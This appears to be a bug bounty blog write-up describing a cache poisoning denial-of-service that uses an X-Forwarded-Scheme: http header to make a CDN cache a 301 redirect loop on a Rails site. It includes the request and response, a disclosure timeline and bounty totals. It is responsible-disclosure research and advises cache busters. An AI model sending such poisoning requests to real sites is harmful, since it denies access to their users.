How I Made $16,500 Hacking CDN Caching Servers — Part 3
@bxmbn
Cache Poisoning DoS Via X-Forwarded-Scheme Header
Bounty: 3,000
I didn’t know this was a thing, until i saw @iustinBB ’s a blog about their research on Cache Poisoning Cache Poisoning at Scale
Sending the x-forwarded-scheme: http header would result into a 301 redirect to the same location. If the response was cached by a CDN, it would cause a redirect loop, inherently denying access to the file.I quickly remembered a Private Program’s asset that was using caching servers and using Ruby on Rails
Request:
GET /?xxx HTTP/2
Host: Redacted
X-Forwarded-Scheme: http
...If you will test this, you should always use “cache busters” (?anything=x) in this case, i used (?xxx) so i don’t mistakenly poisoned other users.
Response:
HTTP/2 301 Moved Permanently
Date: Wed, 19 Jan 2022 17:16:13 GMT
Content-Type: text/html
Location: Redacted
Via: 1.1 vegur
Cf-Cache-Status: HIT
Age: 3If an attacker timed the cache server and poison https://redacted/
The user’s response when requesting https://redacted/ will be
HTTP/2 301 Moved Permanently
Cf-Cache-Status: HIT They won’t be able to access https://redacted/ as the attacker saved the 301 redirect and would not load, until the cache refreshes.
Timeline:
Reported → January 19, 2022
Pending Program Review → January 25, 2022
Triaged → January 25, 2022
Bounty Awarded → January 26, 2022
The total $ for these 3 Reports was $11,300
I chose only these 3 reports because they were the most awarded ones.
I applied the same methodology on other programs, this includes Cache Deception issues like #1343086
Making a total of $15,400 on HackerOne and $1,100 on BugCrowd
Thanks for Reading!
Make sure to follow me on Twitter ;)
